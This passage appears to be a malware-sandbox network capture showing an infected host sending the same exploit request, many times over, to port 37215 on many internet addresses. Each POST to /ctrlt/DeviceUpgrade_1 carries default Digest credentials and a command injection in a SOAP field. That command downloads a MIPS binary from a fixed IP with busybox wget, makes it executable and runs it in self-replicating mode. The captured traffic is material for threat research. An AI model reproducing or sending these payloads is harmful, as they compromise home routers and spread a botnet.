                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.2348424197.143.103.10337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279334068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.2345396157.75.134.24837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279336929 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.2359970197.176.216.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279346943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.2336380170.187.37.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279347897 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.2351064184.80.85.25137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279350996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.2345064157.245.170.17737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279380083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.234517441.39.125.11737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279382944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.2356780161.63.179.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279387951 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.234046641.130.171.18637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279400110 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.2338606169.197.138.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279407978 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
